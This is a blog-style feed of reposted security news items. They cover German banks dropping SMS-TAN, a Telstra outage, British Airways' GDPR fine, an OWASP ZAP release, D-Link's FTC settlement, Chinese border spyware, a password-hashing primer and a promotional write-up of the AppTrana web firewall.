Posted on

German banks to stop using SMS to deliver second authentication/verification factor

German banks are moving away from SMS-based customer authentication and transaction verification (called mTAN or SMS-TAN), as the method is deemed to be too insecure.

German banks SMS-TAN

According to German business news outfit Handelsblatt, a number banks – whether private, co-operative or public – have either stopped offering the option or are planning to remove it by the end of the year. Among these are Postbank, Berliner Sparkasse, Consorsbank, and others.

The reasons are mostly due to security and regulation compliance

Since a lot of people do their online banking via their mobile/smart phones, hackers need to compromise only this device to get all the information needed to perform a fraudulent transaction. Users can have also their online banking credentials compromised and be targeted with fake text messages purportedly coming from the bank.

It’s also becoming common for attackers to perform SIM swapping to impersonate the target’s phone and validate the fraudulent transaction. And, finally, there have been instances of criminals exploiting long-known security vulnerabilities in the SS7 protocols to bypass German banks’ two-factor authentication and drain their customers’ bank accounts.

The German Federal Office for Information Security (BSI) has been warning of security risks of using SMS-TAN for years, Handelsblatt noted, and instances of abuse of the mTan process have become more frequent.

Also, banks and other payment services providers must get in line with the EU Payment Services Directive 2 (PSD2), which mandates that remote electronic transactions performed by EU consumers must be authorized using “strong customer authentication” (SCA).

“‘Strong customer authentication’ means an authentication based on the use of two or more elements categorised as knowledge (something only the user knows), possession (something only the user possesses) and inherence (something the user is) that are independent, in that the breach of one does not compromise the reliability of the others, and is designed in such a way as to protect the confidentiality of the authentication data,” the Directive states.

Also: “Where the payer’s payment service provider does not require strong customer authentication, the payer shall not bear any financial losses unless the payer has acted fraudulently.”

SMS-TAN falls into the “knowledge” element, and the European Banking Authority (EBA) does not considered it to be SCA-compliant.

With the mTan option gone, users will have to start using:

  • ChipTANs (TAN generator devices provided by banks)
  • Photo-TANs (a special mobile app or reader device that photographs a “barcode” on the computer screen and generates the TAN number)
  • Push-TANs (via a specialized Tan app) or
  • Digital signatures (via smart cards).

Read the Full Article here: >Help Net Security – News

Posted on

Cash rules the day when Telstra outage cripples ATMs, payment systems across Australia

Australian shoppers were left high and dry for three or more hours on Thursday when ATMs and some Eftpos terminals stopped working, due to a service outage with Telstra, the country’s main telecommunication provider. 

The nation’s big four banks  — Commonwealth Bank of Australia, Westpac Banking Corporation, Australia and New Zealand Banking Group and National Australia Bank — and many retailers, including Woolworths, Caltex Australia and Australian Post, were among those hit by the failure, leaving many shoppers unable to access cash or complete their payments at the checkout counter. 

The outage began around 3 p.m. AEST on Thursday. Just before 6 p.m. AEST, Telstra confirmed the network was back. “Good news. Many of our services are starting to restore. We’re sorry if this issue has messed up your night. We’ll provide another update when we know more.” the company said in a tweet

Still, retailers lost money during the blackout period. Some restaurants had to let meals go unpaid and some petrol stations were also left hanging, when customers had no cash on them and were unable to get cash, because ATMs were also down, according to iTnews

Just how much did retailers lose out on during the outage? Dominique Lamb, CEO at National Retailers Association, Lamb told the Sydney Morning Herald that in July 2018, AUS$837 million (US $585 million) was spent each day on retail purchases in the country. 

“We know that basically, they were finding it very difficult to trade for the second half of that day which is ultimately going to have an impact … we’re predicting it’s going to be up to $100 million [US$70 million],” she said.

The teleco is still investigating the cause of the outage but says early investigations point to “an unusually large volume of traffic” across networks in NSW Australia, according to the Herald.

Read the Full Article here: >ATM Marketplace News

Posted on

British Airways Fined £183 Million Under GDPR Over 2018 Data Breach

Britain’s Information Commissioner’s Office (ICO) today hit British Airways with a record fine of £183 million for failing to protect the personal information of around half a million of its customers during

last year’s security breach

.

British Airways, who describes itself as “The World’s Favorite Airline,” disclosed a breach last year that exposed personal details and credit-card numbers of up to 380,000 customers and lasted for more than two weeks.

At the time, the company confirmed that customers who booked flights on its official website (ba.com) and British Airways mobile app between August 21 and September 5 had had their details stolen by attackers.

The cyberattack was later attributed to the infamous

Magecart

threat actor, one of the most notorious hacking groups specialized in stealing credit card details from poorly-secured websites, especially online eCommerce platforms.

Magecart hackers have been known for using digital credit card skimmer wherein they secretly insert a few lines of malicious code into the checkout page of a compromised website that captures payment details of customers and then sends it to a remote server.

Besides British Airways, Magecart groups have also been responsible for card breaches on sites belonging to high-profile companies like

TicketMaster

,

Newegg

, as well as sites belonging to other

small online merchants

.

In a statement

released today

, ICO said its extensive investigation found that a variety of information related to British Airways’ customers was compromised by “poor security arrangements” at the company, including their names and addresses, log-ins, payment card data, and travel booking details.

“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft, it is more than an inconvenience,” Information Commissioner Elizabeth Denham said.

“That’s why the law is clear – when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

However, ICO also said that British Airways has cooperated with its investigation and has made improvements to the security arrangements since the last year data breach came to light.

Since the data breach happened after the EU’s General Data Protection Regulation (GDPR) took effect on May 2018, the fine of £183.39 million has been imposed on British Airways, which is the equivalent of 1.5% of the company’s worldwide turnover for its 2017 financial year but is still less than the possible maximum of 4%.

In response to the ICO announcement, British Airways, owned by IAG, said the company was “surprised and disappointed” by the ICO penalty.

“British Airways responded quickly to a criminal act to steal customers’ data,” said British Airways chairman and chief executive Alex Cruz.

“We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologize to our customers for any inconvenience this event caused.”

The company has 28 days to appeal the penalty.

Until now, the most significant penalty by the UK’s data protection watchdog was £500,000, which was

imposed on Facebook

last year for allowing political consultancy firm Cambridge Analytica to gather and misuse data of 87 million users improperly.

The same penalty of £500,000 was also imposed on

credit reporting agency Equifax

last year for its 2017’s massive data breach that exposed the personal and financial information of hundreds of millions of its customers.

Since both the incidents in Facebook and Equifax occurred before GDPR took effect, £500,000 was the maximum penalty ICO can impose under the UK’s old Data Protection Act.

Read the Full Article here: >The Hacker News [ THN ]

Posted on

OWASP ZAP’s new version of its ZAP Project now includes a Heads Up Display

OWASP ZAP (Open Web Application Security Project Zed Attack Proxy) has released a new version of its leading ZAP Project which now includes an innovative Heads Up Display (HUD) bringing security information and functionality right into the browser.

Now software developers can interactively test the reliability and security of their applications in real time while controlling a wide variety of features designed to test the quality of their software.

ZAP is a free, easy to use integrated penetration testing tool. With the addition of the Heads Up Display, ZAP can be used by security professionals and developers of all skill levels to quickly and more easily find security vulnerabilities in their applications.

Given the unique and integrated design of the Heads Up Display, developers and functional testers who might be new to security testing will find ZAP an indispensable tool to build secure software.

In addition to being the most popular free and open source security tools available, ZAP is also one of the most active with hundreds of volunteers around the globe continually improving and enhancing its features.

ZAP provides automated scanners as well as a set of tools that allows new users and security professionals to manually identify security vulnerabilities. ZAP has also been translated into over 25 languages including French, Italian, Dutch, Turkish and Chinese.

Simon Bennetts, OWASP ZAP Project Leader, commented: “This is a really important release for the project team and developers who want to build great and secure applications. The HUD is a completely new interface for ZAP, and one that is unique in the industry. It shows that open source projects continue to create high-quality, new and exciting tools that deliver real value to the market – and at no cost to users.”

“ZAP is the Foundation’s most popular software tool,” said Mike McCamon, interim executive director of the OWASP Foundation. McCamon continued, “For nearly two decades OWASP continues to be a great destination for innovators to host, develop, and release software that will secure the web. Simon and the entire ZAP community deserves great recognition for their continued devotion to open source excellence.”

Read the Full Article here: >Help Net Security – News

Posted on

D-Link Agrees to 10 Years of Security Audits to Settle FTC Charges

Taiwanese networking equipment manufacturer D-Link has agreed to implement a “comprehensive software security program” in order to settle a Federal Trade Commission (FTC) lawsuit alleging that the company didn’t take adequate steps to protect its consumers from hackers.

Your wireless router is the first line of defense against potential threats on the Internet.

However, sadly, most widely-used routers fail to offer necessary security features and have often found vulnerable to serious security flaws, eventually enabling remote attackers to unauthorizedly access networks and compromise the security of other devices connected to it.

In recent years, the security of wireless networks has been more of a hot topic due to cyber attacks, as well as has gained headlines after the discovery of critical vulnerabilities—such as

authentication bypass

,

remote code execution

,

hard-coded login credentials

, and information disclosure—in routers manufactured by various brands.

In 2017, the US Federal Trade Commission (FTC)

filed a lawsuit against D-Link

, one of the more popular router manufacturers, over the poor security of its wireless routers, IP cameras, and other Internet-connected devices.

According to the FTC complaint, D-Link allegedly misrepresented the security of its products to its customers, didn’t adequately test its products for well-known and easy-to-fix security flaws, and also failed to secure devices when security vulnerabilities were reported by independent security researchers.

“Defendants D-Link repeatedly have failed to take reasonable software testing and remediation measures to protect their routers and IP cameras against well known and easily preventable software security flaws,” the FTC complaint says. “In truth and in fact, Defendants did not take reasonable steps to secure their products from unauthorized access.”

In 2015, D-Link also accidentally published its

private code signing keys

on the Internet that could have allowed hackers to sign their malware and evade detection.

On Tuesday, the FTC published [

PDF

] an “amicable” settlement which says D-Link is required to follow proper security planning, threat modeling, vulnerability testing, and remediation before its routers and IP cameras hit the market.

The deal also makes it mandatory for the company to monitor its products for security flaws, automatically update firmware, and set up a system to accept vulnerability reports from security researchers.

Besides this, D-Link has also agreed to go through security audits of its software security program every other year for the next 10 years from a third-party, independent firm, an assessor approved by the FTC.

In a press release, D-Link

claims

the FTC has not found the company liable for any alleged violations, but ironically the company has reached an amicable resolution with the FTC, as mentioned above.

The FTC settled

similar charges with ASUS

over the security of its routers in 2016, when the company agreed to undergo independent security audits every 2 years for the next 20 years.

Read the Full Article here: >The Hacker News [ THN ]

Posted on

China’s Border Guards Secretly Installing Spyware App on Tourists’ Phones

Chinese authorities are secretly installing surveillance apps on smartphones of foreigners at border crossings in the Xinjiang region who are entering from neighboring Kyrgyzstan, an international investigation revealed.

Xinjiang (XUAR) is an autonomous territory and home to many Muslim ethnic minority groups where China is known to be conducting massive surveillance operations, especially on the activities of Uighurs, a Muslim Turkic minority group of about 8 million people.

The Chinese government has blamed the Muslim Turkic minority group for Islamic extremism and deadly attacks on Chinese targets.

According to a joint investigation by

New York Times

, the Guardian, Süddeutsche Zeitung and more, the surveillance app has been designed to instantly extract emails, texts, calendar entries, call records, contacts and insecurely uploads them to a local server set-up at the check-point only.

This suggests that the spyware app has not been designed to continuously and remotely track people while in China. In fact, in the majority of cases, the report says the surveillance app is uninstalled before the phone is returned to its owner.

The spyware, called

Feng Cai

(蜂采) or 

BXAQ

, also scans infected Android devices for over 73,000 pre-defined files related to Islamic extremist groups, including ISIS recruitment fliers, bomb-making instructions, and images of executions.

Besides this, it also looks for segments from the Quran, portions of an Arabic dictionary and information on the Dalai Lama, and for some bizarre reason, the list also includes a song from a Japanese grindcore band called Unholy Grace.

The app can directly be installed on Android phones, but for tourists, journalists, and other foreigners, using Apple devices, the border guards reportedly connect their phones to a hardware-based device that is believed to install similar spyware.

According to researchers at German cybersecurity firm Cure53, who analyzed [

PDF

] a sample of the surveillance app, the names that appear in Feng Cai app’s source code suggest that the app was developed by a unit of FiberHome, a Chinese telecom manufacturer that is partly owned by the government.

“The app is very simple in terms of its user interface, with just three available functions: Scan, Upload, and Uninstall,” the researchers said.

However, it remains unclear how long the collected information on travelers is stored on the Chinese server, or how the government uses it.

“The Chinese government, both in law and practice, often conflates peaceful religious activities with terrorism,” Maya Wang, a Chinese researcher at Human Rights Watch, told NY Times. “You can see in Xinjiang, privacy is a gateway right: Once you lose your right to privacy, you’re going to be afraid of practicing your religion, speaking what’s on your mind or even thinking your thoughts.”

It’s not the first time when Chinese authorities have been caught using spyware to keep tabs on people in the Xinjiang region, as this kind of intensive surveillance is very common in that region. However, it’s the first time when tourists are believed to have been the primary target.

In 2017, Chinese authorities had

forced Xinjiang residents

as well into installing a similar spyware app, called

Jingwang

, on their mobile devices that was intended to prevent them from accessing terrorist information.

Read the Full Article here: >The Hacker News [ THN ]

Posted on

The art and science of password hashing

The recent FlipBoard breach shines a spotlight again on password security and the need for organizations to be more vigilant. Password storage is a critical area where companies must take steps to ensure they don’t leave themselves and their customer data vulnerable.

Storing passwords in plaintext is recognized as a major cybersecurity blunder. Despite this, many companies, including Facebook and Google, have committed this faux pas. When hackers gain access to a plaintext password database, they then have access to all the user accounts in that system, but often, due to the reuse of passwords, it can create a breach domino effect for other organizations.

Why password hashing is essential

Password hashing, where companies encode passwords using a mathematical algorithm, has long been touted as the answer to this problem. Hashing is a one-way cryptographic transformation on a password, turning it into another string, called the hashed password.

When a user chooses a new password, the password is passed through a chosen hash algorithm that performs a mathematical transformation on it, creating a hash value. This hash value is typically represented in hexadecimal format.

This hash is the only thing that is stored for the user’s password. Since the hash algorithm only works in one direction, it’s infeasible to back out the original password using just the hash value (there are other ways to deduce the original password from the hash, but more on that in a minute).

The general idea is that storing hashes rather than plaintext password significantly reduces the possibility that a hacker could retrieve all of the passwords in the system—even if they gain access to the database.

Later when the user logs in and we must verify that the user entered the correct password, the same process is performed again: the entered password is hashed using the same algorithm and the hash is compared to the stored one. If they match, the user is allowed access.

It’s critical to understand the different approaches to password hashing as all hashing algorithms are not created equal.

Hashing 101

Hashing algorithms take an input of any length and return an output of fixed length. This output will look nothing like the original password. While it may seem like the algorithm is pumping out a random number, it is actually a deterministic process. A mathematical formula and hashing table decide which symbols in the input data will become which symbols in the output data. Hackers cannot directly turn a hashed value into the password, but they can determine what the password is if they continually generate hashes from passwords until they find one that matches. This is referred to as a brute-force attack.

With enough time and access to hashing tables, a hacker could reverse engineer a password, which is where salting comes in. For example, they will know the hashes for the most common passwords such as “Password1” or “qwerty,” by using a rainbow table which displays common passwords and their corresponding hashes. This means that, without any additional security, if you input the same password you would see the same output every time.

To protect passwords further, some random characters, called salts, are added to the end of the user’s password, therefore producing a completely different hashing output.

Hashing algorithms

SHA-256 hash – With cryptographic hashing algorithms, similar inputs produce vastly different outputs. Using the SHA-256 hash generator creates an entirely different hashed output even if only one character is changed. This makes it much more difficult for hackers to reverse engineer the input values from the output values. As a result, SHA-256 is the hashing algorithm with Bitcoin cryptocurrency.

MD5 (Message Digest Algorithm) – MD5 is a cryptographic algorithm that will always produce an output of 128 bits (typically expressed as a 32 digit hexadecimal number) no matter the length of the input. It was one of the most widely used hashing algorithms but is now no longer recommended. MD5 is not collision resistant, meaning it’s possible to produce the same hash with different inputs, which makes it a poor cryptographic hashing function.

MD5’s downfall when it comes to passwords was that it was too fast and too popular. As a result, brute force attacks are more likely to be successful due to the thousands of inputs tested, and the popularity of the function makes it attractive to hackers. Today you can find the input to a MD5 hash in seconds by Googling it. Since many businesses already use MD5, they have taken to adding salt to it, creating a salted MD5 output.

MD5Crypt – MD5Crypt added extra functionality to MD5 to make it more resistant to brute force attacks. However, in 2012, the author of MD5Crypt, Poul-Hennin Kamp, declared it as insecure due to the speed of modern hardware.

SHA-1 – SHA-1 suffers from many of the same problems as MD5; it’s very fast, it’s also experienced collision attacks, and is now considered unsafe. Faster computations result in faster brute force attacks, making SHA-1 inherently insecure for storing passwords.

BCrypt – Unlike SHA-1 and MD5, Bcrypt is intentionally slow, which is a good thing when it comes to password security as it limits the attacker’s ability to perform successful brute force attacks. A key aspect of hashing is that it should be a one-way form of encryption. It should be easy to go from the input to the output, but infeasible to find the input from the output. This slowed down hashing function makes cracking the hashes more impervious because it is time-consuming and uses a lot of computing power.

Companies must remain vigilant so that their customer data is not vulnerable. With hashing, there are many different options available; however, it’s vital to recognize that not all hashing algorithms are equal. Some can be cracked with very little time and effort, others require a lot more energy and time to crack.

Hashing is a critical component of password security, but it requires a nuanced approach to protect customer data. Organizations must ensure that their password hashing strategy utilizes robust, modern algorithms that make it almost impossible for hackers to reverse the hashing and read passwords in plain text. By taking a proactive approach companies can reduce the risk of breaches and hackers gaining access to valuable customer data.

Read the Full Article here: >Help Net Security – News

Posted on

AppTrana — Website Security Solution That Actually Works

Data loss and theft continues to rise, and hardly a day goes by without significant data breaches hit the headlines.

In January 2019 alone, 1.76 billion records were leaked, and according to IBM’s Data Breach study, the average cost of each lost or stolen record has reached about $148.

Most of these data leaks are because of malicious attacks, where exploitation of web application vulnerabilities is one of the most common cyber attack vectors.

An application security breach is a problem facing one and all, and no matter what’s the size of your company, your web applications are prone to cyber attacks.

Hackers breach sites for a variety of reasons—some do it for fame, some to get competitive information, whereas some do it just for financial gains. No matter what the reason is, the cost of a security breach is always higher than the cost of protection, leading to loss of data, substantial financial losses, and most importantly, loss of customers’ trust.

If you are a small or mid-size company beginning to make your mark, such data breaches can be fatal.

What is more worrisome is that the cost of a data breach and extent of breaches are growing exponentially year on year, and all these points that the existing solutions are ineffective.

When it comes to application security—WAF (Web Application Firewall) is one of the best-known defences.

While most of the existing solutions fail to protect your organization from such attacks, as they take “one size fits all cookie-cutter” approach, WAF generally comes with standard out of the box rules without understanding specific application needs.

Perils of such an approach are:

  • There is very little understanding of the application context and vulnerabilities specific to the application that hackers can exploit are left unprotected. As the saying goes, security is as good as the weakest link.
  • Most scanners are ineffective when it comes to single page JavaScript-based heavy sites. Moreover, gaps in business logic vulnerabilities can only be found through pen-testing. Results imported from such scanners are at first inadequate, and most often, protection posture is not accurately identified by WAF.
  • Out of box rules are good in an ideal scenario. But as in life, applications in the real world are far from ideal, leading to a lot of false positives and false negatives, making the solution ineffective.
  • Proper implementation of WAF requires tuning of standard rules to meet application-specific needs, but unfortunately, this needs a lot of expertise and time, which are not easy to find.

All this leads to bad implementation of website security, and right vulnerabilities remain undetectable, where WAF is more often deployed in monitor mode in fear of FP’s.

AppTrana is Indusface’s revolutionary solution that has been built specifically to address such shortcomings in existing cloud security solutions.

AppTrana

provides a completely managed, highly reliable, extremely affordable SaaS solution for securing web applications.

With AppTrana, organizations can get:

  • Protection within minutes with zero downtime during the entire transition,
  • Access to highly scalable PCI compliant, infrastructure for their web application security that is scalable to terabytes of data seamlessly with no configuration required from the customer side,
  • Ability to detect vulnerabilities, protect them instantly through virtual patches created by experts and get round the clock visibility to risk posture through integrated AppTrana portal,
  • Get round-the-clock, experts monitored protection for the site against sophisticated DDOS attacks, and
  • Integrated CDN ensures that customers are not forced to choose between speed and security.

Using AppTrana, organizations can concentrate on business without worrying about security, speed, and availability of their website.

The Approach

Indusface approaches the problem of application security differently from traditional vendors.

With AppTrana, organizations can identify the vulnerabilities in the application through its automated and premium (manual penetration testing done by experts) scans. This guarantees that an organization understands the risk posture of their application upfront.

AppTrana’s advance scanner works seamlessly with new-age JS-based heavy sites and is built bottom-up with the integration of WAF in mind, providing it with the ability to learn from WAF traffic insights as well as feeding back the vulnerability status to WAF for protection.

AppTrana enables organizations to provide immediate website protection through virtual patching with its WAF module.

For this, AppTrana provides:

  • Advance Rules – Rules which are written by security experts and that comes with zero false-positive guarantees.
  • Premium Rules – Complex rules for enhanced protection, which may possibly generate some FPs based on particular application design and behavior. These are applied in log mode, monitored and tuned to ensure 0 FP for an application before being put in block mode.
  • Custom Rules – Application-specific rules written by security experts with zero false-positive guarantees based on customer request.

With this approach, AppTrana ensures that security is tuned to meet specific application needs guaranteeing zero false positives.

Also, AppTrana provides around the clock monitoring and expert support to mitigate sophisticated application DDOS attacks, ensuring the availability of your site.

Typical customer journey looks like follows:

With the tightly integrated WAF and Scanner modules, AppTrana ensures that there is constant learning, which is shared across both, improving the efficacy of detection and protection.

For example, deep learning in WAF allows AppTrana to provide a context of application to the scanner that ensures better crawling and detection.

Such integration provides AppTrana unfair advantage that allows Indusface to provide superior protection to its customers.

Plans

You can choose any of the below-listed plans to start the AppTrana Journey.

  • Basic Plan – Free for life. Get started by Identifying Risk Posture of your site through AppTrana’s automated scanner.
  • Advance Plan – At $99/month with 14 days free trial. Get started with immediate protection to the vulnerabilities detected.
  • Premium Plan – At $399/month get complete AppTrana Protection. It comes with one premium scan for every 12 months and unlimited custom rules.

Getting Started

If your organization is interested, you can sign up for AppTrana protection at any point at apptrana.com, and entire onboarding can be done with zero downtime.

You will be requested to provide the domain you would like to protect and then would be asked to verify the configuration; you can choose to enable CDN now or can do the same from settings page later.

Next, you would be requested to provide your SSL certificate, which is required to decrypt and monitor https traffic for attacks. Indusface assures the certificate is encrypted, stored securely, and no one in the company has direct access to customer certificates.

Alternately, your organization can choose to use LetsEncrypt free certificate in which case AppTrana will automatically generate the certificate for the domain, and the organization need not provide any certificate.

Your organization can also choose to buy an Entrust certificate from Indusface.

That’s it, now you will be asked to make CNAME change to have traffic diverted to AppTrana infrastructure and onboarding will be completed, and protection will start immediately.

The Journey

Customers journey starts from the point they make their DNS change. Once the protection starts, a few things happen:

  • The sites get immediate protection with Advance Rules that are fine-tuned to ensure any FP’s. DDOS Protection also gets enabled.
  • A request is sent to Indusface’s Managed service team to monitor traffic.
  • Automated Scan of the site starts that helps AppTrana identify the risk posture of the website. Scan generally takes a few hours to complete depending on the complexity of the site. If the customer wants to do an authenticated scan, then they could provide it from the settings page.
  • Once the scan is complete, customers would get a risk profile mail, which will tell them how many vulnerabilities were found that matters. Customers can view further details by logging to the portal.
  • This page provides all the vulnerabilities that have been detected and their protection status, based on which customers can take further action like requesting custom rule, where the request goes to Indusface managed service team and would create specific rules for the site.
  • Customers can also get their manual Pen-Testing audit done. They can request for the same from the detect page. If it is asked for, Indusface’s security experts would reach out to the customers and understand their needs and do a manual audit to find vulnerabilities that automated scanners cannot. It generally takes 3-4 weeks for the experts to complete the audit and publish the report. Once the report is published, the vulnerabilities found will show up in the detect page, and the customers can request for a custom rule as needed.
  • Meanwhile, the company’s managed service team will monitor the traffic for 14 days and move the site to Premium rules after making necessary adjustments.

Once the site is moved to the Premium rules, Manual penetration testing is done, and all vulnerabilities are protected, the onboarding journey is complete, and the site is completely secured.

As you can see, the entire journey is managed by Indusface team as promised, and there is very little activity that is expected from the customers’ except requesting certain action based on their needs.

Continuous Monitoring

Now, the site moves to a continuous monitoring state. Rules are fine-tuned by Indusface’s Managed Service team continuously based on need. Additional rules are added continuously by Indusface team without any action required from the customers.

Customers are encouraged to start automated scans at least once a month to be up to date on their Risk profile.

Even if changes are not made to site as new signatures are added continuously to the scanner, there is a high probability that new vulnerabilities may be found. Customer can monitor the effectiveness of rules from Protect page.

Being a completely managed solution, Indusface team is always on standby 24*7 to help its customers thwart any sophisticated Layer 7 DDOS attacks as the need arises.

Conclusion

If you are an SME or MSE and are looking for an application security solution that works, then you need not look further.

With a tightly integrated scanner, WAF, and CDN modules, AppTrana is one of the effective solutions in the industry that can guarantee comprehensive protections.

The features explained here are just the tip of the iceberg. We would strongly urge you to sign up for a free trial and explore AppTrana’s capabilities firsthand.

Start with

AppTrana free trial

now, and for additional information, check out the

whitepaper section

.

Read the Full Article here: >The Hacker News [ THN ]